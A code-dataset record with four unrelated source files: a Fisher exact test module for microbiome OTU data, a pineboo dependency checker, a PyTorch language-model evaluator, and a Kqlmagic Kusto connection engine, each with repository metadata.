abundancesObj["cat1"] = cat1 abundancesObj["cat2"] = cat2 return abundancesObj
# =========================================== # # mian Analysis Data Mining/ML Library # @author: tbj128 # # =========================================== # # Imports # # # ======== R specific setup ========= # import rpy2.robjects as robjects import rpy2.rlike.container as rlc from rpy2.robjects.packages import SignatureTranslatedAnonymousPackage import rpy2.robjects.numpy2ri rpy2.robjects.numpy2ri.activate() from gene.model.otu_table import OTUTable class FisherExact(object): r = robjects.r rcode = """ fisher_exact <- function(base, groups, cat2, cat1, minthreshold) { if (ncol(base) <= 0) { return(matrix(,0,7)) } cat1OTUs = base[groups == cat1,, drop=FALSE]; cat2OTUs = base[groups == cat2,, drop=FALSE]; results = matrix(,ncol(cat1OTUs),7) results = data.frame(results) colnames(results) = c("P-Value", "Q-Value", "Cat1 Present", "Cat1 Total", "Cat2 Present", "Cat2 Total") rownames(results) = colnames(cat1OTUs) for (i in 1:ncol(cat1OTUs)) { fisherMatrix = matrix(,2,2); fisherMatrix[1, 1] = sum(cat2OTUs[,i] > minthreshold); fisherMatrix[1, 2] = sum(cat2OTUs[,i] <= minthreshold); fisherMatrix[2, 1] = sum(cat1OTUs[,i] > minthreshold); fisherMatrix[2, 2] = sum(cat1OTUs[,i] <= minthreshold); totalSumCat1 = fisherMatrix[2, 1] + fisherMatrix[2, 2] totalSumCat2 = fisherMatrix[1, 1] + fisherMatrix[1, 2] ftest = fisher.test(fisherMatrix); results[i,1] = colnames(cat1OTUs)[i] results[i,2] = ftest$p.value results[i,3] = 1 results[i,4] = fisherMatrix[1, 1] results[i,5] = totalSumCat2 - fisherMatrix[1, 1] results[i,6] = fisherMatrix[2, 1] results[i,7] = totalSumCat1 - fisherMatrix[2, 1] } results[,3] = p.adjust(results[,2], method = "fdr"); # Sorts the table according to the (p-val) column results = results[order(results[,2]),] return(results) } """ rStats = SignatureTranslatedAnonymousPackage(rcode, "rStats") def run(self, user_request): table = OTUTable(user_request.user_id, user_request.pid) otu_table, headers, sample_labels = table.get_table_after_filtering_and_aggregation(user_request) metadata_vals = table.get_sample_metadata().get_metadata_column_table_order(sample_labels, user_request.catvar) taxonomy_map = table.get_otu_metadata().get_taxonomy_map() return self.analyse(user_request, otu_table, headers, metadata_vals, taxonomy_map) def analyse(self, user_request, otuTable, headers, metaVals, taxonomy_map): otu_to_genus = {} if int(user_request.level) == -1: # We want to display a short hint for the OTU using the genus (column 5) for header in headers: if header in taxonomy_map and len(taxonomy_map[header]) > 5: otu_to_genus[header] = taxonomy_map[header][5] else: otu_to_genus[header] = "" groups = robjects.FactorVector(robjects.StrVector(metaVals)) # Forms an OTU only table (without IDs) allOTUs = [] col = 0 while col < len(otuTable[0]): allOTUs.append((headers[col], otuTable[:, col])) col += 1 od = rlc.OrdDict(allOTUs) dataf = robjects.DataFrame(od) catVar1 = user_request.get_custom_attr("pwVar1") catVar2 = user_request.get_custom_attr("pwVar2") minthreshold = user_request.get_custom_attr("minthreshold") fisherResults = self.rStats.fisher_exact(dataf, groups, catVar1, catVar2, int(minthreshold)) hints = {} results = [] i = 1 while i <= fisherResults.nrow: newRow = [] j = 1 while j <= fisherResults.ncol: if j > 1: newRow.append(round(float(fisherResults.rx(i, j)[0]), 6)) else: newRow.append(str(fisherResults.rx(i, j)[0])) j += 1 otu = newRow[0] if int(user_request.level) == -1: hints[otu] = otu_to_genus[otu] i += 1 results.append(newRow) cat1 = catVar1 cat2 = catVar2 abundancesObj = {} abundancesObj["results"] = results abundancesObj["hints"] = hints abundancesObj["cat1"] = cat1 abundancesObj["cat2"] = cat2 return abundancesObj
en
0.448911
# =========================================== # # mian Analysis Data Mining/ML Library # @author: tbj128 # # =========================================== # # Imports # # # ======== R specific setup ========= # fisher_exact <- function(base, groups, cat2, cat1, minthreshold) { if (ncol(base) <= 0) { return(matrix(,0,7)) } cat1OTUs = base[groups == cat1,, drop=FALSE]; cat2OTUs = base[groups == cat2,, drop=FALSE]; results = matrix(,ncol(cat1OTUs),7) results = data.frame(results) colnames(results) = c("P-Value", "Q-Value", "Cat1 Present", "Cat1 Total", "Cat2 Present", "Cat2 Total") rownames(results) = colnames(cat1OTUs) for (i in 1:ncol(cat1OTUs)) { fisherMatrix = matrix(,2,2); fisherMatrix[1, 1] = sum(cat2OTUs[,i] > minthreshold); fisherMatrix[1, 2] = sum(cat2OTUs[,i] <= minthreshold); fisherMatrix[2, 1] = sum(cat1OTUs[,i] > minthreshold); fisherMatrix[2, 2] = sum(cat1OTUs[,i] <= minthreshold); totalSumCat1 = fisherMatrix[2, 1] + fisherMatrix[2, 2] totalSumCat2 = fisherMatrix[1, 1] + fisherMatrix[1, 2] ftest = fisher.test(fisherMatrix); results[i,1] = colnames(cat1OTUs)[i] results[i,2] = ftest$p.value results[i,3] = 1 results[i,4] = fisherMatrix[1, 1] results[i,5] = totalSumCat2 - fisherMatrix[1, 1] results[i,6] = fisherMatrix[2, 1] results[i,7] = totalSumCat1 - fisherMatrix[2, 1] } results[,3] = p.adjust(results[,2], method = "fdr"); # Sorts the table according to the (p-val) column results = results[order(results[,2]),] return(results) } # We want to display a short hint for the OTU using the genus (column 5) # Forms an OTU only table (without IDs)
2.188932
2
pineboolib/application/utils/check_dependencies.py
deavid/pineboo
2
6627865
<gh_stars>1-10 # -*- coding: utf-8 -*- """Check the application dependencies.""" import sys from pineboolib.core.utils import logging from pineboolib.core.utils.utils_base import is_deployed from pineboolib.core.utils.check_dependencies import get_dependency_errors from pineboolib.core.utils.check_dependencies import DependencyCheck, DependencyError from pineboolib.application import project logger = logging.getLogger(__name__) def check_dependencies(dict_: DependencyCheck, exit: bool = True) -> bool: """ Check if a package is installed and return the result. @param dict_. Dict with the name of the agency and the module to be checked. @param exit . Exit if dependence fails. """ dep_error: DependencyError = get_dependency_errors(dict_) if not dep_error: return True msg = "" logger.debug("Error trying to import modules:\n%s", "\n\n".join(dep_error.values())) logger.warning("Unmet dependences:") for (dep, suggestedpkg), errormsg in dep_error.items(): logger.warning("Install package %s for %s", suggestedpkg, dep) msg += "Instale el paquete %s.\n%s" % (suggestedpkg, errormsg) if dep == "pyfpdf": msg += "\n\n\n Use pip3 install -i https://test.pypi.org/simple/ pyfpdf==1.7.3" if exit: if project.DGI.useDesktop() and project.DGI.localDesktop(): from pineboolib.qt3_widgets.messagebox import MessageBox MessageBox.warning(None, "Pineboo - Dependencias Incumplidas -", msg, MessageBox.Ok) if not is_deployed(): sys.exit(32) return False
# -*- coding: utf-8 -*- """Check the application dependencies.""" import sys from pineboolib.core.utils import logging from pineboolib.core.utils.utils_base import is_deployed from pineboolib.core.utils.check_dependencies import get_dependency_errors from pineboolib.core.utils.check_dependencies import DependencyCheck, DependencyError from pineboolib.application import project logger = logging.getLogger(__name__) def check_dependencies(dict_: DependencyCheck, exit: bool = True) -> bool: """ Check if a package is installed and return the result. @param dict_. Dict with the name of the agency and the module to be checked. @param exit . Exit if dependence fails. """ dep_error: DependencyError = get_dependency_errors(dict_) if not dep_error: return True msg = "" logger.debug("Error trying to import modules:\n%s", "\n\n".join(dep_error.values())) logger.warning("Unmet dependences:") for (dep, suggestedpkg), errormsg in dep_error.items(): logger.warning("Install package %s for %s", suggestedpkg, dep) msg += "Instale el paquete %s.\n%s" % (suggestedpkg, errormsg) if dep == "pyfpdf": msg += "\n\n\n Use pip3 install -i https://test.pypi.org/simple/ pyfpdf==1.7.3" if exit: if project.DGI.useDesktop() and project.DGI.localDesktop(): from pineboolib.qt3_widgets.messagebox import MessageBox MessageBox.warning(None, "Pineboo - Dependencias Incumplidas -", msg, MessageBox.Ok) if not is_deployed(): sys.exit(32) return False
en
0.734964
# -*- coding: utf-8 -*- Check the application dependencies. Check if a package is installed and return the result. @param dict_. Dict with the name of the agency and the module to be checked. @param exit . Exit if dependence fails.
2.179031
2
lm/evaluator.py
aistairc/lm_syntax_negative
3
6627866
import torch from lm_trainer import TokenNegLossCalculator import utils class Evaluator(object): def __init__(self, pad_id): self.pad_id = pad_id class DocumentEvaluator(Evaluator): def __init__(self, bptt, pad_id): super().__init__(pad_id) self.bptt = bptt def evaluate(self, model, batch_gen): device = next(model.parameters()).device # Turn on evaluation mode which disables dropout. model.rnn.eval() total_loss = 0 ntokens = model.vocab.size hidden = model.rnn.init_hidden(batch_gen.batch_size) for data, targets in batch_gen.for_eval(): data = data.to(device) targets = targets.to(device) output, hidden = model.rnn(data, hidden) total_loss += data.size(1) * model.loss(output, targets).item() hidden = utils.repackage_hidden(hidden) return total_loss / batch_gen.data.size(1) class SentenceEvaluator(Evaluator): def __init__(self, pad_id, neg_loss_calculator=None, exclude=[]): """exclude: excluded token index. exclude=[0, -1, -2] means excluding first, last tokens, and eos. """ super().__init__(pad_id) if neg_loss_calculator: self.neg_loss_calculator = neg_loss_calculator # neg_loss_calculator should only be used during training. # exclude, on the other hand, should only be used for testing. assert len(exclude) == 0 self.exclude = exclude def evaluate(self, model, batch_gen): with torch.no_grad(): return self._evaluate(model, batch_gen) def _evaluate(self, model, batch_gen): device = next(model.parameters()).device model.eval() all_tokens = 0 total_cross_entropy_loss = 0.0 total_margin_loss = 0.0 total_correct = 0 total_margin_sents = 0 for batch in batch_gen.for_eval(): if len(batch) == 3 or len(batch) == 4: if len(batch) == 3: sources, lengths, targets = batch ent_loss = self._cross_entropy_loss( model, sources, lengths, targets, device) else: sources, lengths, targets, negatives = batch ent_loss, margin_loss = self._cross_entropy_token_neg_loss( model, sources, lengths, targets, negatives, device) total_margin_loss += margin_loss if len(self.exclude) > 0: nexclude = len(self.exclude) non_zero = sum([max(0, l - nexclude) for l in lengths]).item() else: non_zero = lengths.sum().item() all_tokens += non_zero total_cross_entropy_loss += ent_loss * non_zero else: margin_loss, _, _ = self.neg_loss_calculator.loss(model, batch) total_margin_loss += margin_loss.item() * len(batch[0]) # margin_loss, n_correct = self._margin_loss(model, batch, device) # total_margin_loss += margin_loss * len(batch[0]) # total_correct += n_correct # total_margin_sents += len(batch[0]) total_loss = total_cross_entropy_loss + total_margin_loss avg_loss = total_cross_entropy_loss / all_tokens agreement_accuracy = total_correct / total_margin_sents \ if total_margin_sents > 0 else 0 return total_loss, avg_loss, total_margin_loss, agreement_accuracy def _cross_entropy_loss(self, model, sources, lengths, targets, device): sources = sources.to(device) lengths = lengths.to(device) targets = targets.to(device) output, _ = model.rnn(sources, input_lengths = lengths) targets = self._mask_targets_by_exlude(targets, lengths) return model.loss(output, targets).item() def _cross_entropy_token_neg_loss( self, model, sources, lengths, targets, negatives, device): assert isinstance(self.neg_loss_calculator, TokenNegLossCalculator) sources = sources.to(device) lengths = lengths.to(device) targets = targets.to(device) output, _ = model.rnn(sources, input_lengths = lengths) raw_loss = model.loss(output, targets, reduce=False) unlikelihood_loss = self.neg_loss_calculator.loss( model, output, targets, negatives, sources.size(1)) unlikelihood_sum = unlikelihood_loss.sum() ntokens = lengths.sum() ent_avg = raw_loss.sum() / ntokens return (ent_avg.item(), unlikelihood_sum.item()) def _mask_targets_by_exlude(self, targets, lengths): if len(self.exclude) == 0: return targets maxlen = lengths.max() offset = 0 for l in lengths: for e in self.exclude: if e >= 0: idx = offset + e else: idx = offset + l + e targets[idx] = self.pad_id offset += maxlen return targets # def _margin_loss(self, model, batch, device): # assert self.margin_criterion is not None # gold_srcs, lengths, gold_tgts, wrong_srcs, wrong_tgts = batch # gold_srcs = gold_srcs.to(device) # lengths = lengths.to(device) # gold_tgts = gold_tgts.to(device) # wrong_srcs = wrong_srcs.to(device) # wrong_tgts = wrong_tgts.to(device) # gold_outputs, _ = model.rnn(gold_srcs, input_lengths = lengths, return_h = False) # wrong_outputs, _ = model.rnn(wrong_srcs, input_lengths = lengths, return_h = False) # gold_probs = model.loss(gold_outputs, gold_tgts, reduce=False) * -1.0 # (total_length, 1) # wrong_probs = model.loss(wrong_outputs, wrong_tgts, reduce=False) * -1.0 # # We first decompose *_probs into sentences using `lengths`. # gold_sent_probs = gold_probs.new_zeros(lengths.size(0)) # wrong_sent_probs = gold_probs.new_zeros(lengths.size(0)) # offset = 0 # for i, l in enumerate(lengths): # gold_sent_probs[i] = gold_probs[offset:offset+l].sum() # wrong_sent_probs[i] = wrong_probs[offset:offset+l].sum() # offset += l # assert offset == lengths.sum() # gold_sent_probs = gold_sent_probs.unsqueeze(1) # wrong_sent_probs = wrong_sent_probs.unsqueeze(1) # probs = torch.cat((gold_sent_probs, wrong_sent_probs), 1) # targets = gold_sent_probs.new_zeros(gold_sent_probs.size(0), dtype=torch.long) # n_correct = len([p for p in probs if p[0] > p[1]]) # return self.margin_criterion(probs, targets).item(), n_correct def word_stats(self, model, tensors, pad_id = None, calc_entropy = True): '''Given a list of sentences (word ids), calculate two stats: surprisals and entropys. Input tensors are *unsorted* sentences. This internally sorts the input first, for batch processing. After obtaining stats for sorted inputs, then, this returns the stats for each sentence after recovering the original sentence order. ''' if not pad_id: pad_id = self.pad_id device = next(model.parameters()).device # batch_size = 100 model.eval() sources, lengths, targets, perm_idx, reverse_idx = ( self._sources_to_sorted_tensors(tensors, device, pad_id)) output, _ = model.rnn(sources, input_lengths = lengths) output = output.detach() surps = model.loss(output, targets, reduce=False).detach() surps = surps.squeeze(1) entropys = model.entropy(output).detach() if calc_entropy else None list_surps = [] list_ents = [] offset = 0 for j in range(len(lengths)): idx = j l = lengths[j].item() sent_surps = surps[offset:offset+l].cpu().numpy() list_surps.append(sent_surps) if calc_entropy: sent_ents = entropys[offset:offset+l].cpu().numpy() list_ents.append(sent_ents) offset += l list_surps = [list_surps[i] for i in reverse_idx] if calc_entropy: list_ents = [list_ents[i] for i in reverse_idx] else: list_ents = list_surps return (list_surps, list_ents) def _sources_to_sorted_tensors(self, tensors, device, pad_id): lengths = torch.tensor([len(s)-1 for s in tensors]) lengths, perm_idx = lengths.sort(0, descending=True) sources = [tensors[i] for i in perm_idx] sources, lengths, targets = utils.get_sorted_sentences_batch( sources, 0, len(tensors), pad_id, sorted=True) sources = sources.to(device) lengths = lengths.to(device) targets = targets.to(device) reverse_idx = [0] * len(perm_idx) for i, order in enumerate(perm_idx): reverse_idx[order] = i return sources, lengths, targets, perm_idx, reverse_idx def get_layer_hiddens(self, model, tensors, pad_id = None, only_top_layer = False, context = [0]): # 0 means w_t, -1 means w_{t-1} """Run RNN on the in puts, and obtain a sequence of numpy arrays of the size [ndarray(num_layers, sequence_length, representation_dim)]. """ if not pad_id: pad_id = self.pad_id device = next(model.parameters()).device # batch_size = 100 model.eval() sources, lengths, targets, perm_idx, reverse_idx = ( self._sources_to_sorted_tensors(tensors, device, pad_id)) _, _, outputs, _ = model.rnn(sources, input_lengths = lengths, return_h=True) # outputs is a list of tensors. Each tensor corresponds to one layer, and has # the size of (seq_len, batch_size, hidden_size). # (batch_size, seq_len, hidden_size), probably? outputs = [output.detach() for output in outputs] hidden_arrays = [] # Single element list means that the only layer is the top layer. layers = [len(outputs)-1] if only_top_layer else list(range(len(outputs))) max_layer_dim = max([outputs[layer].size(2) for layer in layers]) for i, length in enumerate(lengths): def layer_to_array(layer): context_array = [] current_emb_dim = outputs[layer].size(2) if current_emb_dim < max_layer_dim: remain_size = max_layer_dim - current_emb_dim # Our LSTMs may have different hidden dim for each layer. # This method makes dimensions of all layers the same, by filling 0 # for smaller dim layer. def may_expand(emb): return torch.cat([emb, emb.new_zeros(emb.size(0), remain_size)], 1) else: # If dim of this layer is maximum, do nothing. def may_expand(emb): return emb for c in context: # "1+c:1+c+length-1" means that index 1 is offset. Index 1 # corresponds to encoding of the first token (0 corresponds to BOS). layer_output = outputs[layer][i,1+c:1+c+length-1,:] layer_output = may_expand(layer_output) context_array.append(layer_output) array = torch.cat(context_array, -1).unsqueeze(0) return array arrays = [layer_to_array(layer) for layer in layers] array = torch.cat(arrays, 0).cpu().numpy() # array = torch.cat(arrays, 0) # print(array.size()) # array = array.cpu().numpy() hidden_arrays.append(array) hidden_arrays = [hidden_arrays[i] for i in reverse_idx] return hidden_arrays
import torch from lm_trainer import TokenNegLossCalculator import utils class Evaluator(object): def __init__(self, pad_id): self.pad_id = pad_id class DocumentEvaluator(Evaluator): def __init__(self, bptt, pad_id): super().__init__(pad_id) self.bptt = bptt def evaluate(self, model, batch_gen): device = next(model.parameters()).device # Turn on evaluation mode which disables dropout. model.rnn.eval() total_loss = 0 ntokens = model.vocab.size hidden = model.rnn.init_hidden(batch_gen.batch_size) for data, targets in batch_gen.for_eval(): data = data.to(device) targets = targets.to(device) output, hidden = model.rnn(data, hidden) total_loss += data.size(1) * model.loss(output, targets).item() hidden = utils.repackage_hidden(hidden) return total_loss / batch_gen.data.size(1) class SentenceEvaluator(Evaluator): def __init__(self, pad_id, neg_loss_calculator=None, exclude=[]): """exclude: excluded token index. exclude=[0, -1, -2] means excluding first, last tokens, and eos. """ super().__init__(pad_id) if neg_loss_calculator: self.neg_loss_calculator = neg_loss_calculator # neg_loss_calculator should only be used during training. # exclude, on the other hand, should only be used for testing. assert len(exclude) == 0 self.exclude = exclude def evaluate(self, model, batch_gen): with torch.no_grad(): return self._evaluate(model, batch_gen) def _evaluate(self, model, batch_gen): device = next(model.parameters()).device model.eval() all_tokens = 0 total_cross_entropy_loss = 0.0 total_margin_loss = 0.0 total_correct = 0 total_margin_sents = 0 for batch in batch_gen.for_eval(): if len(batch) == 3 or len(batch) == 4: if len(batch) == 3: sources, lengths, targets = batch ent_loss = self._cross_entropy_loss( model, sources, lengths, targets, device) else: sources, lengths, targets, negatives = batch ent_loss, margin_loss = self._cross_entropy_token_neg_loss( model, sources, lengths, targets, negatives, device) total_margin_loss += margin_loss if len(self.exclude) > 0: nexclude = len(self.exclude) non_zero = sum([max(0, l - nexclude) for l in lengths]).item() else: non_zero = lengths.sum().item() all_tokens += non_zero total_cross_entropy_loss += ent_loss * non_zero else: margin_loss, _, _ = self.neg_loss_calculator.loss(model, batch) total_margin_loss += margin_loss.item() * len(batch[0]) # margin_loss, n_correct = self._margin_loss(model, batch, device) # total_margin_loss += margin_loss * len(batch[0]) # total_correct += n_correct # total_margin_sents += len(batch[0]) total_loss = total_cross_entropy_loss + total_margin_loss avg_loss = total_cross_entropy_loss / all_tokens agreement_accuracy = total_correct / total_margin_sents \ if total_margin_sents > 0 else 0 return total_loss, avg_loss, total_margin_loss, agreement_accuracy def _cross_entropy_loss(self, model, sources, lengths, targets, device): sources = sources.to(device) lengths = lengths.to(device) targets = targets.to(device) output, _ = model.rnn(sources, input_lengths = lengths) targets = self._mask_targets_by_exlude(targets, lengths) return model.loss(output, targets).item() def _cross_entropy_token_neg_loss( self, model, sources, lengths, targets, negatives, device): assert isinstance(self.neg_loss_calculator, TokenNegLossCalculator) sources = sources.to(device) lengths = lengths.to(device) targets = targets.to(device) output, _ = model.rnn(sources, input_lengths = lengths) raw_loss = model.loss(output, targets, reduce=False) unlikelihood_loss = self.neg_loss_calculator.loss( model, output, targets, negatives, sources.size(1)) unlikelihood_sum = unlikelihood_loss.sum() ntokens = lengths.sum() ent_avg = raw_loss.sum() / ntokens return (ent_avg.item(), unlikelihood_sum.item()) def _mask_targets_by_exlude(self, targets, lengths): if len(self.exclude) == 0: return targets maxlen = lengths.max() offset = 0 for l in lengths: for e in self.exclude: if e >= 0: idx = offset + e else: idx = offset + l + e targets[idx] = self.pad_id offset += maxlen return targets # def _margin_loss(self, model, batch, device): # assert self.margin_criterion is not None # gold_srcs, lengths, gold_tgts, wrong_srcs, wrong_tgts = batch # gold_srcs = gold_srcs.to(device) # lengths = lengths.to(device) # gold_tgts = gold_tgts.to(device) # wrong_srcs = wrong_srcs.to(device) # wrong_tgts = wrong_tgts.to(device) # gold_outputs, _ = model.rnn(gold_srcs, input_lengths = lengths, return_h = False) # wrong_outputs, _ = model.rnn(wrong_srcs, input_lengths = lengths, return_h = False) # gold_probs = model.loss(gold_outputs, gold_tgts, reduce=False) * -1.0 # (total_length, 1) # wrong_probs = model.loss(wrong_outputs, wrong_tgts, reduce=False) * -1.0 # # We first decompose *_probs into sentences using `lengths`. # gold_sent_probs = gold_probs.new_zeros(lengths.size(0)) # wrong_sent_probs = gold_probs.new_zeros(lengths.size(0)) # offset = 0 # for i, l in enumerate(lengths): # gold_sent_probs[i] = gold_probs[offset:offset+l].sum() # wrong_sent_probs[i] = wrong_probs[offset:offset+l].sum() # offset += l # assert offset == lengths.sum() # gold_sent_probs = gold_sent_probs.unsqueeze(1) # wrong_sent_probs = wrong_sent_probs.unsqueeze(1) # probs = torch.cat((gold_sent_probs, wrong_sent_probs), 1) # targets = gold_sent_probs.new_zeros(gold_sent_probs.size(0), dtype=torch.long) # n_correct = len([p for p in probs if p[0] > p[1]]) # return self.margin_criterion(probs, targets).item(), n_correct def word_stats(self, model, tensors, pad_id = None, calc_entropy = True): '''Given a list of sentences (word ids), calculate two stats: surprisals and entropys. Input tensors are *unsorted* sentences. This internally sorts the input first, for batch processing. After obtaining stats for sorted inputs, then, this returns the stats for each sentence after recovering the original sentence order. ''' if not pad_id: pad_id = self.pad_id device = next(model.parameters()).device # batch_size = 100 model.eval() sources, lengths, targets, perm_idx, reverse_idx = ( self._sources_to_sorted_tensors(tensors, device, pad_id)) output, _ = model.rnn(sources, input_lengths = lengths) output = output.detach() surps = model.loss(output, targets, reduce=False).detach() surps = surps.squeeze(1) entropys = model.entropy(output).detach() if calc_entropy else None list_surps = [] list_ents = [] offset = 0 for j in range(len(lengths)): idx = j l = lengths[j].item() sent_surps = surps[offset:offset+l].cpu().numpy() list_surps.append(sent_surps) if calc_entropy: sent_ents = entropys[offset:offset+l].cpu().numpy() list_ents.append(sent_ents) offset += l list_surps = [list_surps[i] for i in reverse_idx] if calc_entropy: list_ents = [list_ents[i] for i in reverse_idx] else: list_ents = list_surps return (list_surps, list_ents) def _sources_to_sorted_tensors(self, tensors, device, pad_id): lengths = torch.tensor([len(s)-1 for s in tensors]) lengths, perm_idx = lengths.sort(0, descending=True) sources = [tensors[i] for i in perm_idx] sources, lengths, targets = utils.get_sorted_sentences_batch( sources, 0, len(tensors), pad_id, sorted=True) sources = sources.to(device) lengths = lengths.to(device) targets = targets.to(device) reverse_idx = [0] * len(perm_idx) for i, order in enumerate(perm_idx): reverse_idx[order] = i return sources, lengths, targets, perm_idx, reverse_idx def get_layer_hiddens(self, model, tensors, pad_id = None, only_top_layer = False, context = [0]): # 0 means w_t, -1 means w_{t-1} """Run RNN on the in puts, and obtain a sequence of numpy arrays of the size [ndarray(num_layers, sequence_length, representation_dim)]. """ if not pad_id: pad_id = self.pad_id device = next(model.parameters()).device # batch_size = 100 model.eval() sources, lengths, targets, perm_idx, reverse_idx = ( self._sources_to_sorted_tensors(tensors, device, pad_id)) _, _, outputs, _ = model.rnn(sources, input_lengths = lengths, return_h=True) # outputs is a list of tensors. Each tensor corresponds to one layer, and has # the size of (seq_len, batch_size, hidden_size). # (batch_size, seq_len, hidden_size), probably? outputs = [output.detach() for output in outputs] hidden_arrays = [] # Single element list means that the only layer is the top layer. layers = [len(outputs)-1] if only_top_layer else list(range(len(outputs))) max_layer_dim = max([outputs[layer].size(2) for layer in layers]) for i, length in enumerate(lengths): def layer_to_array(layer): context_array = [] current_emb_dim = outputs[layer].size(2) if current_emb_dim < max_layer_dim: remain_size = max_layer_dim - current_emb_dim # Our LSTMs may have different hidden dim for each layer. # This method makes dimensions of all layers the same, by filling 0 # for smaller dim layer. def may_expand(emb): return torch.cat([emb, emb.new_zeros(emb.size(0), remain_size)], 1) else: # If dim of this layer is maximum, do nothing. def may_expand(emb): return emb for c in context: # "1+c:1+c+length-1" means that index 1 is offset. Index 1 # corresponds to encoding of the first token (0 corresponds to BOS). layer_output = outputs[layer][i,1+c:1+c+length-1,:] layer_output = may_expand(layer_output) context_array.append(layer_output) array = torch.cat(context_array, -1).unsqueeze(0) return array arrays = [layer_to_array(layer) for layer in layers] array = torch.cat(arrays, 0).cpu().numpy() # array = torch.cat(arrays, 0) # print(array.size()) # array = array.cpu().numpy() hidden_arrays.append(array) hidden_arrays = [hidden_arrays[i] for i in reverse_idx] return hidden_arrays
en
0.691408
# Turn on evaluation mode which disables dropout. exclude: excluded token index. exclude=[0, -1, -2] means excluding first, last tokens, and eos. # neg_loss_calculator should only be used during training. # exclude, on the other hand, should only be used for testing. # margin_loss, n_correct = self._margin_loss(model, batch, device) # total_margin_loss += margin_loss * len(batch[0]) # total_correct += n_correct # total_margin_sents += len(batch[0]) # def _margin_loss(self, model, batch, device): # assert self.margin_criterion is not None # gold_srcs, lengths, gold_tgts, wrong_srcs, wrong_tgts = batch # gold_srcs = gold_srcs.to(device) # lengths = lengths.to(device) # gold_tgts = gold_tgts.to(device) # wrong_srcs = wrong_srcs.to(device) # wrong_tgts = wrong_tgts.to(device) # gold_outputs, _ = model.rnn(gold_srcs, input_lengths = lengths, return_h = False) # wrong_outputs, _ = model.rnn(wrong_srcs, input_lengths = lengths, return_h = False) # gold_probs = model.loss(gold_outputs, gold_tgts, reduce=False) * -1.0 # (total_length, 1) # wrong_probs = model.loss(wrong_outputs, wrong_tgts, reduce=False) * -1.0 # # We first decompose *_probs into sentences using `lengths`. # gold_sent_probs = gold_probs.new_zeros(lengths.size(0)) # wrong_sent_probs = gold_probs.new_zeros(lengths.size(0)) # offset = 0 # for i, l in enumerate(lengths): # gold_sent_probs[i] = gold_probs[offset:offset+l].sum() # wrong_sent_probs[i] = wrong_probs[offset:offset+l].sum() # offset += l # assert offset == lengths.sum() # gold_sent_probs = gold_sent_probs.unsqueeze(1) # wrong_sent_probs = wrong_sent_probs.unsqueeze(1) # probs = torch.cat((gold_sent_probs, wrong_sent_probs), 1) # targets = gold_sent_probs.new_zeros(gold_sent_probs.size(0), dtype=torch.long) # n_correct = len([p for p in probs if p[0] > p[1]]) # return self.margin_criterion(probs, targets).item(), n_correct Given a list of sentences (word ids), calculate two stats: surprisals and entropys. Input tensors are *unsorted* sentences. This internally sorts the input first, for batch processing. After obtaining stats for sorted inputs, then, this returns the stats for each sentence after recovering the original sentence order. # batch_size = 100 # 0 means w_t, -1 means w_{t-1} Run RNN on the in puts, and obtain a sequence of numpy arrays of the size [ndarray(num_layers, sequence_length, representation_dim)]. # batch_size = 100 # outputs is a list of tensors. Each tensor corresponds to one layer, and has # the size of (seq_len, batch_size, hidden_size). # (batch_size, seq_len, hidden_size), probably? # Single element list means that the only layer is the top layer. # Our LSTMs may have different hidden dim for each layer. # This method makes dimensions of all layers the same, by filling 0 # for smaller dim layer. # If dim of this layer is maximum, do nothing. # "1+c:1+c+length-1" means that index 1 is offset. Index 1 # corresponds to encoding of the first token (0 corresponds to BOS). # array = torch.cat(arrays, 0) # print(array.size()) # array = array.cpu().numpy()
2.356591
2
azure/Kqlmagic/kusto_engine.py
lupino3/jupyter-Kqlmagic
0
6627867
<reponame>lupino3/jupyter-Kqlmagic # ------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # -------------------------------------------------------------------------- from Kqlmagic.kql_engine import KqlEngine, KqlEngineError from Kqlmagic.kusto_client import Kusto_Client from Kqlmagic.constants import ConnStrKeys class KustoEngine(KqlEngine): # Constants # --------- _URI_SCHEMA_NAME = "azuredataexplorer" # no spaces, underscores, and hyphe-minus, because they are ignored in parser _ALT_URI_SCHEMA1_NAME = "adx" # no spaces, underscores, and hyphe-minus, because they are ignored in parser _ALT_URI_SCHEMA2_NAME = "ade" # no spaces, underscores, and hyphe-minus, because they are ignored in parser _ALT_URI_SCHEMA3_NAME = "kusto" # no spaces, underscores, and hyphe-minus, because they are ignored in parser _ALT_URI_SCHEMA_NAMES = [_URI_SCHEMA_NAME, _ALT_URI_SCHEMA1_NAME, _ALT_URI_SCHEMA2_NAME, _ALT_URI_SCHEMA3_NAME] _MANDATORY_KEY = ConnStrKeys.DATABASE _VALID_KEYS_COMBINATIONS = [ [ConnStrKeys.TENANT, ConnStrKeys.ANONYMOUS, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS], [ConnStrKeys.TENANT, ConnStrKeys.CODE, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS], [ConnStrKeys.TENANT, ConnStrKeys.USERNAME, ConnStrKeys.PASSWORD, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS], [ConnStrKeys.TENANT, ConnStrKeys.CLIENTID, ConnStrKeys.CLIENTSECRET, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS], [ ConnStrKeys.TENANT, ConnStrKeys.CLIENTID, ConnStrKeys.CERTIFICATE, ConnStrKeys.CERTIFICATE_THUMBPRINT, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS, ], ] # Class methods # ------------- # Instance methods # ---------------- def __init__(self, conn_str, user_ns: dict, current=None, conn_class=None): super().__init__() if isinstance(conn_str, dict): self.conn_class = conn_class self.database_name = conn_str.get(ConnStrKeys.DATABASE) self.cluster_name = conn_str.get(ConnStrKeys.CLUSTER) self.alias = conn_str.get(ConnStrKeys.ALIAS) self.bind_url = "{0}://{1}('{2}').{3}('{4}')".format( self._URI_SCHEMA_NAME, ConnStrKeys.CLUSTER, self.cluster_name, ConnStrKeys.DATABASE, self.database_name ) else: self._parsed_conn = self._parse_common_connection_str( conn_str, current, self._URI_SCHEMA_NAME, self._MANDATORY_KEY, self._VALID_KEYS_COMBINATIONS, user_ns ) self.client = Kusto_Client(self._parsed_conn) def get_client(self): if self.client is None: cluster_connection = self.conn_class.get_connection_by_name("@" + self.cluster_name) if cluster_connection is None: raise KqlEngineError("connection to cluster not set.") return cluster_connection.get_client() else: return self.client
